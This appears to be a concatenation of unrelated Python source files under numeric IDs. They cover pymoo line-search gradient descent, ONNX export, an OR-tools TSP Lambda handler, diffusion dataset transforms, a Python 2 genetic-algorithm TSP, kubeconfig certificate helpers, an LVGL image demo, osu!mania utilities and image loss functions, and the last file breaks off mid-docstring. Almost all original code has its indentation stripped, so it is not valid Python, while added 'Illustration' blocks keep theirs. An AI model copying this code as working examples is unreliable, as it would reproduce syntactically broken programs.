103860
|
import numpy as np
from pymoo.experimental.deriv import DerivationBasedAlgorithm
from pymoo.algorithms.base.line import LineSearchProblem
from pymoo.algorithms.soo.univariate.exp import ExponentialSearch
from pymoo.algorithms.soo.univariate.golden import GoldenSectionSearch
from pymoo.core.population import Population
from pymoo.util.vectors import max_alpha
class GradientDescent(DerivationBasedAlgorithm):
def direction(self, dF, **kwargs):
return - dF
def step(self):
problem, sol = self.problem, self.opt[0]
self.evaluator.eval(self.problem, sol, evaluate_values_of=["dF"])
dF = sol.get("dF")[0]
print(sol)
if np.linalg.norm(dF) ** 2 < 1e-8:
self.termination.force_termination = True
return
direction = self.direction(dF)
line = LineSearchProblem(self.problem, sol, direction, strict_bounds=self.strict_bounds)
alpha = self.alpha
if self.strict_bounds:
if problem.has_bounds():
line.xu = np.array([max_alpha(sol.X, direction, *problem.bounds(), mode="all_hit_bounds")])
# remember the step length from the last run
alpha = min(alpha, line.xu[0])
if alpha == 0:
self.termination.force_termination = True
return
# make the solution to be the starting point of the univariate search
x0 = sol.copy(deep=True)
x0.set("__X__", x0.get("X"))
x0.set("X", np.zeros(1))
# determine the brackets to be searched in
exp = ExponentialSearch(delta=alpha).setup(line, evaluator=self.evaluator, termination=("n_iter", 20), x0=x0)
a, b = exp.run().pop[-2:]
# search in the brackets
res = GoldenSectionSearch().setup(line, evaluator=self.evaluator, termination=("n_iter", 20), a=a, b=b).run()
infill = res.opt[0]
# set the alpha value and revert the X to be the multi-variate one
infill.set("X", infill.get("__X__"))
self.alpha = infill.get("alpha")[0]
# keep always a few historical solutions
self.pop = Population.merge(self.pop, infill)[-10:]
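# --- Illustration (not part of pymoo) --------------------------------------
# A minimal, self-contained sketch of the idea used in step() above: take the
# steepest-descent direction, bracket a step length exponentially, then refine
# it with a golden-section search. The helper names below (golden_section,
# _demo_gradient_descent_with_line_search) are written for this example only
# and are not pymoo API.
def _demo_gradient_descent_with_line_search():
    A = np.array([[3.0, 0.5], [0.5, 1.0]])
    b = np.array([1.0, -2.0])

    def f(x):
        return 0.5 * x @ A @ x - b @ x

    def grad(x):
        return A @ x - b

    def golden_section(phi, lo, hi, n_iter=50):
        # classic golden-section search for a 1-d minimum in [lo, hi]
        inv_phi = (np.sqrt(5.0) - 1.0) / 2.0
        for _ in range(n_iter):
            c = hi - inv_phi * (hi - lo)
            d = lo + inv_phi * (hi - lo)
            if phi(c) < phi(d):
                hi = d
            else:
                lo = c
        return 0.5 * (lo + hi)

    x = np.zeros(2)
    for _ in range(25):
        d = -grad(x)  # steepest-descent direction
        if np.linalg.norm(d) ** 2 < 1e-12:
            break
        # crude exponential bracketing of the step length, as ExponentialSearch does
        alpha = 1e-3
        while f(x + 2.0 * alpha * d) < f(x + alpha * d):
            alpha *= 2.0
        step = golden_section(lambda a: f(x + a * d), 0.0, 2.0 * alpha)
        x = x + step * d
    return x  # should approach the solution of A x = b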
|
103865
|
import argparse
import os
import sys
sys.path.insert(0, os.path.join(os.path.dirname(__file__), '../'))
import torch
from volksdep.converters import torch2onnx
from vedaseg.runners import InferenceRunner
from vedaseg.utils import Config
def parse_args():
parser = argparse.ArgumentParser(description='Convert to Onnx model.')
parser.add_argument('config', help='config file path')
parser.add_argument('checkpoint', help='checkpoint file path')
parser.add_argument('out', help='output onnx file name')
parser.add_argument('--dummy_input_shape', default='3,800,1344',
type=str, help='model input shape like 3,800,1344. '
'Shape format is CxHxW')
parser.add_argument('--dynamic_shape', default=False, action='store_true',
help='whether to use dynamic shape')
parser.add_argument('--opset_version', default=9, type=int,
help='onnx opset version')
parser.add_argument('--do_constant_folding', default=False,
action='store_true',
help='whether to apply constant-folding optimization')
parser.add_argument('--verbose', default=False, action='store_true',
help='whether print convert info')
args = parser.parse_args()
return args
def main():
args = parse_args()
cfg = Config.fromfile(args.config)
inference_cfg = cfg['inference']
common_cfg = cfg.get('common')
runner = InferenceRunner(inference_cfg, common_cfg)
assert runner.use_gpu, 'Please use valid gpu to export model.'
runner.load_checkpoint(args.checkpoint)
model = runner.model
shape = map(int, args.dummy_input_shape.split(','))
dummy_input = torch.randn(1, *shape)
if args.dynamic_shape:
print(f'Convert to Onnx with dynamic input shape and '
f'opset version {args.opset_version}')
else:
print(f'Convert to Onnx with constant input shape '
f'{args.dummy_input_shape} and '
f'opset version {args.opset_version}')
torch2onnx(model, dummy_input, args.out, dynamic_shape=args.dynamic_shape,
opset_version=args.opset_version,
do_constant_folding=args.do_constant_folding,
verbose=args.verbose)
print(f'Convert successfully, saved onnx file: {os.path.abspath(args.out)}')
if __name__ == '__main__':
main()
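# --- Illustration ----------------------------------------------------------
# volksdep's torch2onnx wraps PyTorch's exporter; a rough equivalent using
# torch.onnx.export directly is sketched below. The toy model and output path
# are made up for this example and nothing here is called by the script above.
def _export_toy_example(out_path='toy.onnx'):
    toy = torch.nn.Sequential(torch.nn.Conv2d(3, 8, 3, padding=1), torch.nn.ReLU())
    dummy = torch.randn(1, 3, 64, 64)
    torch.onnx.export(toy, dummy, out_path,
                      opset_version=11,
                      do_constant_folding=True,
                      verbose=False)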
|
103909
|
from __future__ import print_function
from six.moves import xrange
from ortools.constraint_solver import pywrapcp
from ortools.constraint_solver import routing_enums_pb2
import urllib.request
import json
from geopy.distance import vincenty
test_20 = {
"points": [[10.773687, 106.703263], [10.731158, 106.716759], [10.729461, 106.714041], [10.768337, 106.700743], [10.827278, 106.678072], [10.772264, 106.681347], [10.786769, 106.640134], [10.875387, 106.755127], [10.808667, 106.711705], [10.774575, 106.705748], [10.827971, 106.727006], [10.770907, 106.6681], [10.769285, 106.674728], [10.737721, 106.675189], [10.786519, 106.693997], [10.798453, 106.667866], [10.772691, 106.693676], [10.783066, 106.695901], [10.754833, 106.66052], [10.770541, 106.703162]],
"transport_mode": "1N1",
"distance_calculation": "VINCENTY"
}
def return_lambda_gateway_response(code, body):
return {"statusCode": code, "body": json.dumps(body)}
def vincenty_distance(pos_1, pos_2):
pos_1 = (pos_1[0], pos_1[1])
pos_2 = (pos_2[0], pos_2[1])
return vincenty(pos_1, pos_2).meters
def create_distance_matrix(locations, transport_mode, distance_calculation):
# Create the distance matrix.
dist_matrix = {}
# complete distance matrix
# precompute distance between location to have distance callback in O(1)
if distance_calculation == "OSRM":
url = "https://bi.ahamove.com/osrm/table/v1/driving/"
for loc in locations:
url += str(loc[1]) + "," + str(loc[0]) + ";"
url = url[:-1] + "?annotations=distance"
response = urllib.request.urlopen(url).read().decode('UTF-8')
contents = json.loads(response)["distances"]
if transport_mode == "N1":
for index in xrange(len(locations)):
contents[0][index] = 0
if transport_mode == "1N":
for index in xrange(len(locations)):
contents[index][0] = 0
dist_matrix = contents
else:
for from_node in xrange(len(locations)):
dist_matrix[from_node] = {}
for to_node in xrange(len(locations)):
if (from_node == to_node) or (transport_mode == "1N" and to_node == 0) or (transport_mode == "N1" and from_node == 0):
dist_matrix[from_node][to_node] = 0
else:
distance = (vincenty_distance(
locations[from_node],
locations[to_node]))
dist_matrix[from_node][to_node] = distance
return dist_matrix
def create_distance_callback(dist_matrix):
# Create the distance callback.
def distance_callback(from_node, to_node):
return int(dist_matrix[from_node][to_node])
return distance_callback
def tsp(event, context):
# Create the data.
try:
locations = event["points"]
transport_mode = event["transport_mode"]
distance_calculation = event.get("distance_calculation", "VINCENTY")
# Error handling
except KeyError as e:
print("Missing required input: " + str(e))
cluster = {"title": "Missing required input: " + str(e)}
return return_lambda_gateway_response(400, cluster)
if transport_mode != "1N" and transport_mode != "N1" and transport_mode != "1N1":
cluster = {"title": "Invalid transport_mode"}
return return_lambda_gateway_response(400, cluster)
if distance_calculation != "VINCENTY" and distance_calculation != "OSRM":
cluster = {"title": "Invalid distance_calculation"}
return return_lambda_gateway_response(400, cluster)
if distance_calculation == "OSRM" and len(locations) > 100:
cluster = {"title": "Bad request: OSRM cannot be used with more than 100 points"}
return return_lambda_gateway_response(400, cluster)
dist_matrix = create_distance_matrix(locations, transport_mode, distance_calculation)
dist_callback = create_distance_callback(dist_matrix)
tsp_size = len(locations)
num_routes = 1
depot = 0
# Create routing model.
if tsp_size > 0:
routing = pywrapcp.RoutingModel(tsp_size, num_routes, depot)
search_parameters = pywrapcp.RoutingModel.DefaultSearchParameters()
routing.SetArcCostEvaluatorOfAllVehicles(dist_callback)
# Solve the problem.
assignment = routing.SolveWithParameters(search_parameters)
if assignment:
# Solution cost.
print("Total distance: " + str(assignment.ObjectiveValue()) + "\n")
# Inspect solution.
# Only one route here; otherwise iterate from 0 to routing.vehicles() - 1.
route_number = 0
node = routing.Start(route_number)
if transport_mode == "N1":
node = assignment.Value(routing.NextVar(node))
start_node = node
route = ''
cluster = []
while not routing.IsEnd(node):
cluster.append(locations[node])
route += str(node) + ' -> '
node = assignment.Value(routing.NextVar(node))
if transport_mode != "1N":
route += '0'
cluster.append([locations[0]])
print("Route:\n\n" + route)
return return_lambda_gateway_response(200, {"route": cluster})
else:
print('No solution found.')
else:
print('Specify an instance greater than 0.')
def main():
event = test_20
print(tsp(event, ""))
if __name__ == '__main__':
main()
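# --- Illustration ----------------------------------------------------------
# The handler expects an event shaped like test_20 above. A tiny four-point
# round trip ("1N1") with the VINCENTY matrix could be invoked as sketched
# below (coordinates are arbitrary, and this relies on the same legacy
# or-tools RoutingModel API used in tsp()).
def _tiny_example():
    event = {
        "points": [[10.77, 106.70], [10.73, 106.71], [10.76, 106.69], [10.80, 106.72]],
        "transport_mode": "1N1",
        "distance_calculation": "VINCENTY",
    }
    # returns {"statusCode": 200, "body": '{"route": [...]}'} on success
    return tsp(event, None)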
|
103918
|
import os
import torch
import numbers
import torchvision.transforms as transforms
import torchvision.transforms.functional as F
from torch.utils.data import Subset, TensorDataset
import numpy as np
def get_dataset(args, config):
if config.data.random_flip is False:
tran_transform = test_transform = transforms.Compose(
[transforms.Resize(config.data.image_size), transforms.ToTensor()]
)
else:
tran_transform = transforms.Compose(
[
transforms.Resize(config.data.image_size),
transforms.RandomHorizontalFlip(p=0.5),
transforms.ToTensor(),
]
)
test_transform = transforms.Compose(
[transforms.Resize(config.data.image_size), transforms.ToTensor()]
)
train_samples = np.load(args.train_fname)
train_labels = np.zeros(len(train_samples))
data_mean = np.mean(train_samples, axis=(0, 2, 3), keepdims=True)
data_std = np.std(train_samples, axis=(0, 2, 3), keepdims=True)
train_samples = (train_samples - data_mean)/data_std
print("train data shape are - ", train_samples.shape, train_labels.shape)
print("train data stats are - ", np.mean(train_samples), np.std(train_samples),
np.min(train_samples), np.max(train_samples))
dataset = torch.utils.data.TensorDataset(
torch.from_numpy(train_samples).float(), torch.from_numpy(train_labels).float())
return dataset
def logit_transform(image, lam=1e-6):
image = lam + (1 - 2 * lam) * image
return torch.log(image) - torch.log1p(-image)
def data_transform(config, X):
if config.data.uniform_dequantization:
X = X / 256.0 * 255.0 + torch.rand_like(X) / 256.0
if config.data.gaussian_dequantization:
X = X + torch.randn_like(X) * 0.01
if config.data.rescaled:
X = 2 * X - 1.0
elif config.data.logit_transform:
X = logit_transform(X)
if hasattr(config, "image_mean"):
return X - config.image_mean.to(X.device)[None, ...]
return X
def inverse_data_transform(config, X):
if hasattr(config, "image_mean"):
X = X + config.image_mean.to(X.device)[None, ...]
if config.data.logit_transform:
X = torch.sigmoid(X)
elif config.data.rescaled:
X = (X + 1.0) / 2.0
return torch.clamp(X, 0.0, 1.0)
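# --- Illustration ----------------------------------------------------------
# A minimal round-trip check of data_transform / inverse_data_transform. The
# nested config is faked with SimpleNamespace and only carries the fields the
# two functions actually read.
def _transform_roundtrip_example():
    from types import SimpleNamespace
    config = SimpleNamespace(data=SimpleNamespace(
        uniform_dequantization=False,
        gaussian_dequantization=False,
        rescaled=True,
        logit_transform=False,
    ))
    x = torch.rand(2, 3, 8, 8)             # values in [0, 1]
    y = data_transform(config, x)          # rescaled to [-1, 1]
    x_back = inverse_data_transform(config, y)
    return torch.allclose(x, x_back, atol=1e-6)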
|
103920
|
import networkzero as nw0
address = nw0.advertise("myservice3", 1234)
print("Service is at address", address)
|
103928
|
import os
import shutil
from vilya.libs.permdir import get_repo_root
from vilya.models.project import CodeDoubanProject
from tests.base import TestCase
class TestBasic(TestCase):
def test_create_git_repo(self):
git_path = os.path.join(get_repo_root(), 'abc.git')
CodeDoubanProject.create_git_repo(git_path)
assert os.path.exists(git_path)
info_file = os.path.join(git_path, 'refs')
assert os.path.exists(info_file)
shutil.rmtree(git_path)
|
103944
|
import random, sys, gzip
class tour:
def __init__(self):
self.path = [None] * 1
self.fit = 0
self.travel = 0
def mutate(self):
a = random.randint(0, len(self.path)-1)
b = random.randint(0, len(self.path)-1)
temp = self.path[a]
self.path[a] = self.path[b]
self.path[b] = temp
def blanktour(self, size):
self.path = [None] * size
        return self.path
def newtour(self,tovisit):
self.path = tovisit[:]
random.shuffle(self.path)
return self.path
def setpath(self,update):
self.path = update
def tourlen(self):
return len(self.path)
def visits(self,city):
return (city in self.path)
def get(self,idx):
return self.path[idx]
def setspot(self, put, spot):
self.path[spot] = put
self.fit = 0
self.travel = 0
def getfit(self):
if (self.fit == 0):
self.fit = 1.0/self.getdist()
return self.fit
def getdist(self):
if (self.travel == 0):
self.calc()
return self.travel
def calc(self):
tot = 0
for i in range(len(self.path)-1):
tot += self.path[i].distanceTo(self.path[i+1].index)
self.travel = tot
return tot
def tostr(self):
build = ""
build = str ( map(maphelper3, self.path))
return build
class vertex:
def __init__(self, idx):
self.name = "Austin"
self.edges = {}
self.index = idx
self.pos = (0,0)
def setpos(self, x, y):
self.pos = (x,y)
def setIndex(self, idxin):
self.index = idxin
def setName(self,namein):
self.name = namein
def addEdge(self, v, edge_weight):
self.edges[v.getIdx()] = edge_weight
# if symmetric
v.edges[self.index] = edge_weight
def distanceTo(self, otheridx):
return self.edges[otheridx]
def getIdx(self):
return self.index
def maphelper(t):
return t.getfit()
def maphelper2(t):
return t.tostr()
def maphelper3(v):
return int(v.name)
class pop:
def __init__(self, initpopsize, initflag, cities):
self.tours = [None] * initpopsize
self.size = initpopsize
self.popset = False
if (initflag):
for i in range(len(self.tours)):
t = tour()
debug = t.newtour(cities)
self.tours[i] = t
def get(self,index):
return self.tours[index]
def settour(self,index, tourtoset):
self.tours[index] = tourtoset
    def popsize(self):
return self.size
def calc(self):
self.popcorn = map( maphelper , self.tours)
self.popset = True
return self.popcorn
def tostr(self):
if (self.popset):
return zip(map(maphelper2, self.tours), self.popcorn)
else:
return map(maphelper2, self.tours)
def max_fit(self): # returns tuple of tour, fitness val
if (not self.popset):
self.calc()
self.popset = True
val = max(self.popcorn)
return (self.tours[self.popcorn.index(val)], val)
def getparent(self, subpopsize, cities):
if ( self.popset):
temp = random.randint(0, len(self.popcorn) - subpopsize)
subpop = self.popcorn[temp:temp+subpopsize]
return self.tours[ subpop.index(max(subpop)) + temp]
else:
temp = random.randint(0, len(self.tours) - subpopsize)
subpop = pop(subpopsize, False, cities)
subpop.tours = self.tours[temp:temp+subpopsize]
subpop.calc()
return subpop.max_fit()[0]
class gen:
def __init__(self, mutationrate, gensize, tournamentsize, elitismflag, cities):
self.rate = mutationrate
self.poolsize = gensize
self.tsize = tournamentsize
self.eflag = elitismflag
self.saved = cities
self.pool = pop(gensize, True, cities)
def evolve(self):
nextpool = pop(self.poolsize, False, self.saved)
start = 0
if (self.eflag):
elite = self.pool.max_fit()
nextpool.settour(0, elite[0])
start += 1
# Crossover step
for i in range(start, self.poolsize):
tourA = self.pool.getparent(self.tsize, self.saved)
tourB = self.pool.getparent(self.tsize, self.saved)
nextpool.settour(i, self.cross(tourA,tourB))
# Mutation step
for m in nextpool.tours:
if random.random() < self.rate:
m.mutate()
self.pool = nextpool
def cross(self,tourA, tourB):
apath = tourA.path
bpath = tourB.path
s = random.randint(0, len(apath))
e = random.randint(s, len(apath))
subb = [elem for elem in bpath if not(elem in apath[s:e])]
child = subb[:s] + apath[s:e] + subb[s:]
childtour = tour()
childtour.setpath(child)
return childtour
def distance(posa, posb):
return ( (posb[1] - posa[1]) ** 2 + (posb[0] - posa[0]) ** 2 ) ** 0.5
def main():
path = sys.argv[1]
# with gzip.open(path,'rb') as f:
# file = f.readlines()
file = open(path, 'r')
counter = 0
curr_cities = []
for line in file:
if ord(line[0]) >= 58 or ord(line[0]) <= 47 :
continue
temp = line.strip().split()
city = vertex(counter)
city.setName(temp[0])
city.setpos(float(temp[1]), float(temp[2]))
for i in range(counter-1, -1, -1):
city.addEdge( curr_cities[i] ,distance( city.pos, curr_cities[i].pos))
curr_cities.append(city)
counter += 1
r = int(sys.argv[2])
p = int(sys.argv[3])
# mutation rate, popsize, tourneysize, eliteflag, cities
mr = float(sys.argv[4])
ps = int(sys.argv[5])
ts = int(sys.argv[6])
ga = gen(mr, ps, ts, True, curr_cities)
for i in range(r):
ga.evolve()
if i % p == 0:
print "Best route at Generation", i
macks = ga.pool.max_fit()
print macks[0].tostr(),macks[1], macks[0].getdist()
print "Best route at end"
macks = ga.pool.max_fit()
print macks[0].tostr(), macks[0].getdist()
# perfect = [1, 49, 32, 45, 19, 41, 8, 9, 10, 43, 33, 51, 11, 52, 14, 13, 47, 26, 27, 28, 12, 25, 4, 6, 15, 5, 24, 48 ,38, 37, 40, 39, 36, 35, 34, 44, 46, 16, 29, 50, 20, 23, 30, 2, 7, 42, 21, 17, 3, 18, 31, 22]
# perf = tour()
# perfpath= []
# for i in perfect:
# perfpath.append(curr_cities[i-1])
# perf.setpath(perfpath)
# print perf.getdist()
# it was like just under 8000 for berlin test
main()
|
103961
|
from __future__ import absolute_import
import openshift as oc
import base64
import json
def get_kubeconfig():
"""
:return: Returns the current kubeconfig as a python dict
"""
return json.loads(oc.invoke('config',
cmd_args=['view',
'-o=json',
'--raw',
],
no_namespace=True).out().strip())
def _get_kubeconfig_model(_kc_model=None):
if _kc_model:
return _kc_model
else:
return oc.Model(dict_to_model=get_kubeconfig())
def get_kubeconfig_cluster_names(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns a list of all the cluster names in the kubeconfig.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
names = []
for cluster_entry in kc.clusters:
names.append(cluster_entry.name)
return names
def get_kubeconfig_current_context_name(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns the name of the current context in your kubeconfig
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
return kc['current-context']
def get_kubeconfig_context(context_name=None, _kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:param context_name: The context to retrieve or None to retrieve the current context.
:return: Returns a dict of the specified context or current context. e.g. {cluster:..., namespace:...., user:....}
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if context_name is None:
context_name = get_kubeconfig_current_context_name(_kc_model=kc)
for context_entry in kc.contexts:
if context_entry.name == context_name:
return context_entry.context._primitive()
return None
def get_kubeconfig_current_cluster_name(_kc_model=None):
"""
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns the cluster associated with the current context.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
current_context_name = get_kubeconfig_current_context_name(_kc_model=kc)
return get_kubeconfig_context(context_name=current_context_name, _kc_model=kc)['cluster']
def get_kubeconfig_cluster(cluster_name=None, _kc_model=None):
"""
:param cluster_name: The context to retrieve or None for current context dict
:param _kc_model: Internally used to cache kubeconfig info.
:return: Returns a raw bytes from kubeconfig in a dict of the specified cluster or current cluster.
e.g. {server:.. certificate-authority-data:.}. Note that since the bytes are raw, an entry like
    certificate-authority-data would need to be decoded to get PEM content.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if cluster_name is None:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
for cluster_entry in kc.clusters:
if cluster_entry.name == cluster_name:
return cluster_entry.cluster._primitive()
return None
def set_kubeconfig_insecure_skip_tls_verify(active, cluster_name=None, _kc_model=None):
"""
Sets or removes insecure-skip-tls-verify for the specified cluster (or the current cluster if
not specified).
    :param active: If True, enable insecure-skip-tls-verify for the cluster
:param cluster_name: The cluster name to modify. If not specified, the current context's cluster will be modified.
:param _kc_model: Internally used to cache kubeconfig info.
"""
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=_kc_model)
oc.invoke('config',
cmd_args=['set-cluster',
cluster_name,
'--insecure-skip-tls-verify={}'.format(str(active).lower()),
],
no_namespace=True)
def remove_kubeconfig_certifcate_authority(cluster_name=None, _kc_model=None):
"""
    When you install a valid certificate for your API endpoint, you may want to
use your host's local certificate authorities. To do that, references to certificate
authorities must be removed from your kubeconfig.
:param cluster_name: The cluster name to modify. If not specified, the current context's cluster will be modified.
:param _kc_model: Internally used to cache kubeconfig info.
"""
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=_kc_model)
# Setting insecure will remove any other certificate-authority data from the cluster's entry
set_kubeconfig_insecure_skip_tls_verify(True, cluster_name=cluster_name, _kc_model=_kc_model)
# Now set it back to false, removing the insecure-skip-tls-verify entry from kubeconfig
set_kubeconfig_insecure_skip_tls_verify(False, cluster_name=cluster_name, _kc_model=_kc_model)
def get_kubeconfig_certificate_authority_data(cluster_name=None, _kc_model=None):
"""
Returns the certificate authority data (if any) for the specified cluster.
:param cluster_name: The cluster name to inspect. If not specified, the ca data will be
returned for the current context's cluster.
:param _kc_model: Internally used to cache kubeconfig info.
:return: The PEM encoded x509 data or None if the cluster did not posses a certificate-authority-data
field.
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
cluster_dict = get_kubeconfig_cluster(cluster_name, _kc_model=kc)
data = cluster_dict.get('certificate-authority-data', None)
if data:
# the data is base64 encoded PEM, so decode it.
return base64.b64decode(data)
return None
def set_kubeconfig_certificate_authority_data(ca_data, cluster_name=None, _kc_model=None):
"""
Sets the certificate authority data for one or more clusters in the kubeconfig.
:param ca_data: The certificate authority data (PEM format). The chain will be encoded into
base64 before being set in the kubeconfig.
:param cluster_name: The cluster name to affect. If not specified, the ca data will be
set for the current context.
:param _kc_model: Internally used to cache kubeconfig info.
:return: n/a
"""
kc = _get_kubeconfig_model(_kc_model=_kc_model)
if not cluster_name:
cluster_name = get_kubeconfig_current_cluster_name(_kc_model=kc)
# The kubeconfig cluster entry may have an existing certificate-authority file or have
    # insecure-skip-tls-verify set to true. Having ca-data set alongside either of these is
    # an invalid state for the kubeconfig, so we use a trick: setting insecure-skip-tls-verify
    # will clear existing certificate authority entries. When we set it back to false, we can
    # safely poke in the ca-data
remove_kubeconfig_certifcate_authority(cluster_name=cluster_name, _kc_model=kc)
b64_data = base64.b64encode(ca_data)
# Now we can poke in the value that we need
oc.invoke('config',
# https://github.com/kubernetes/kubectl/issues/501#issuecomment-406890261
cmd_args=['set',
'clusters.{}.certificate-authority-data'.format(cluster_name),
b64_data
],
no_namespace=True)
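# --- Illustration ----------------------------------------------------------
# A short sketch stringing the helpers above together against the current
# context. The PEM content below is a placeholder, not a real certificate.
def _example_inspect_and_set_ca():
    cluster = get_kubeconfig_current_cluster_name()
    print("current cluster:", cluster)
    existing = get_kubeconfig_certificate_authority_data(cluster_name=cluster)
    if existing is None:
        placeholder_pem = b"-----BEGIN CERTIFICATE-----\n...\n-----END CERTIFICATE-----\n"
        set_kubeconfig_certificate_authority_data(placeholder_pem, cluster_name=cluster)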
|
104015
|
try:
with open('../../../assets/img_cogwheel_argb.bin','rb') as f:
cogwheel_img_data = f.read()
except:
try:
with open('images/img_cogwheel_rgb565.bin','rb') as f:
cogwheel_img_data = f.read()
except:
print("Could not find binary img_cogwheel file")
# create the cogwheel image data
cogwheel_img_dsc = lv.img_dsc_t(
{
"header": {"always_zero": 0, "w": 100, "h": 100, "cf": lv.img.CF.TRUE_COLOR_ALPHA},
"data": cogwheel_img_data,
"data_size": len(cogwheel_img_data),
}
)
# Create an image using the decoder
img1 = lv.img(lv.scr_act(),None)
lv.img.cache_set_size(2)
img1.align(lv.scr_act(), lv.ALIGN.CENTER, 0, -50)
img1.set_src(cogwheel_img_dsc)
img2 = lv.img(lv.scr_act(), None)
img2.set_src(lv.SYMBOL.OK+"Accept")
img2.align(img1, lv.ALIGN.OUT_BOTTOM_MID, 0, 20)
|
104081
|
import math
from misc.callback import callback
# Drawing parameters
class ManiaSettings():
viewable_time_interval = 1000 # ms
note_width = 50 # osu!px
note_height = 15 # osu!px
note_seperation = 5 # osu!px
replay_opacity = 50 # %
@staticmethod
@callback
def set_viewable_time_interval(viewable_time_interval):
ManiaSettings.viewable_time_interval = viewable_time_interval
ManiaSettings.set_viewable_time_interval.emit()
@staticmethod
@callback
def set_note_width(note_width):
ManiaSettings.note_width = note_width
ManiaSettings.set_note_width.emit()
@staticmethod
@callback
def set_note_height(note_height):
ManiaSettings.note_height = note_height
ManiaSettings.set_note_height.emit()
@staticmethod
@callback
def set_note_seperation(note_seperation):
ManiaSettings.note_seperation = note_seperation
ManiaSettings.set_note_seperation.emit()
@staticmethod
@callback
def set_replay_opacity(replay_opacity):
ManiaSettings.replay_opacity = replay_opacity
ManiaSettings.set_replay_opacity.emit()
@staticmethod
def get_spatial_data(space_width, space_height, num_columns, time):
ratio_x = space_width/Mania.PLAYFIELD_WIDTH # px per osu!px
ratio_y = space_height/Mania.PLAYFIELD_HEIGHT # px per osu!px
ratio_t = space_height/ManiaSettings.viewable_time_interval # px per ms
total_width = num_columns*(ManiaSettings.note_width + ManiaSettings.note_seperation)*ratio_x
start_time = time
end_time = time + ManiaSettings.viewable_time_interval
x_offset = space_width/2.0 - total_width/2.0
y_offset = space_height
return start_time, end_time, ratio_x, ratio_y, ratio_t, x_offset, y_offset
class Mania():
PLAYFIELD_WIDTH = 512 # osu!px
PLAYFIELD_HEIGHT = 384 # osu!px
@staticmethod
def is_hitobject_type(hitobject_type, compare):
return hitobject_type & compare > 0
@staticmethod
def get_time_range(hitobjects, column=None):
if column != None:
try: return (hitobjects[column][0].time, hitobjects[column][-1].end_time)
except: return (hitobjects[column][0].time, hitobjects[column][-1].time)
all_time_range = [ math.inf, -math.inf ]
for column in range(len(hitobjects)):
column_time_range = Mania.get_time_range(hitobjects, column)
all_time_range[0] = min(all_time_range[0], column_time_range[0])
all_time_range[1] = max(all_time_range[1], column_time_range[1])
print(all_time_range)
return (all_time_range[0], all_time_range[1])
@staticmethod
def get_acc_from_hits(num_300_hits, num_200_hits, num_100_hits, num_50_hits, num_misses):
score_hits = 50*num_50_hits + 100*num_100_hits + 200*num_200_hits + 300*num_300_hits
score_total = 300*(num_misses + num_50_hits + num_100_hits + num_200_hits + num_300_hits)
return score_hits/score_total
# Returns the key column based on the xpos of the note and the number of keys there are
@staticmethod
def get_column(x_pos, columns):
ratio = columns / Mania.PLAYFIELD_WIDTH # columns per osu!px
return min(math.floor(ratio*x_pos), columns - 1)
@staticmethod
def get_key_presses(key_val):
        # Generator yielding the value of each set bit in an integer; yields 0
        # when n == 0 so the caller always gets at least one value.
def bits(n):
if n == 0: yield 0
while n:
b = n & (~n+1)
yield b
n ^= b
def keys(bit_list):
for bit in bit_list:
if bit == 0: continue
yield math.log2(bit)
return keys(bits(int(key_val)))
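# --- Illustration ----------------------------------------------------------
# Quick check of the bit decoding above: key_val = 5 is binary 101, so the
# generator should yield columns 0 and 2 (as floats from math.log2).
def _key_press_example():
    return list(Mania.get_key_presses(5))   # [0.0, 2.0]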
|
104100
|
import sys
import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
from utils.modules.vggNet import VGGFeatureExtractor
class TVLoss(nn.Module):
def __init__(self, weight=1.0):
super(TVLoss, self).__init__()
self.weight = weight
self.l1 = nn.L1Loss(reduction='mean')
def forward(self, out, gt):
grad_out_x = out[:, :, :, 1:] - out[:, :, :, :-1]
grad_out_y = out[:, :, 1:, :] - out[:, :, :-1, :]
grad_gt_x = gt[:, :, :, 1:] - gt[:, :, :, :-1]
grad_gt_y = gt[:, :, 1:, :] - gt[:, :, :-1, :]
loss_x = self.l1(grad_out_x, grad_gt_x)
loss_y = self.l1(grad_out_y, grad_gt_y)
loss = self.weight * (loss_x + loss_y)
return loss
class CharbonnierLoss(nn.Module):
"""Charbonnier Loss (L1)"""
def __init__(self, eps=1e-6, mode=None):
super(CharbonnierLoss, self).__init__()
self.eps = eps
self.mode = mode
def forward(self, x, y, mask=None):
N = x.size(1)
diff = x - y
loss = torch.sqrt(diff * diff + self.eps)
if mask is not None:
loss = loss * mask
if self.mode == 'sum':
loss = torch.sum(loss) / N
else:
loss = loss.mean()
return loss
class BBL(nn.Module):
def __init__(self, alpha=1.0, beta=1.0, ksize=3, pad=0, stride=3, dist_norm='l2', criterion='l1'):
super(BBL, self).__init__()
self.alpha = alpha
self.beta = beta
self.ksize = ksize
self.pad = pad
self.stride = stride
self.dist_norm = dist_norm
if criterion == 'l1':
self.criterion = torch.nn.L1Loss(reduction='mean')
elif criterion == 'l2':
            self.criterion = torch.nn.MSELoss(reduction='mean')
else:
raise NotImplementedError('%s criterion has not been supported.' % criterion)
def pairwise_distance(self, x, y=None):
'''
Input: x is a Nxd matrix
        y is an optional Mxd matrix
Output: dist is a BxNxM matrix where dist[i,j] is the square norm between x[i,:] and y[j,:]
if y is not given then use 'y=x'.
i.e. dist[i,j] = ||x[i,:]-y[j,:]||^2
'''
x_norm = (x ** 2).sum(1).view(-1, 1)
if y is not None:
y_t = torch.transpose(y, 0, 1)
y_norm = (y ** 2).sum(1).view(1, -1)
else:
y_t = torch.transpose(x, 0, 1)
y_norm = x_norm.view(1, -1)
dist = x_norm + y_norm - 2.0 * torch.mm(x, y_t)
# Ensure diagonal is zero if x=y
if y is None:
dist = dist - torch.diag(dist.diag())
return torch.clamp(dist, 0.0, np.inf)
def batch_pairwise_distance(self, x, y=None):
'''
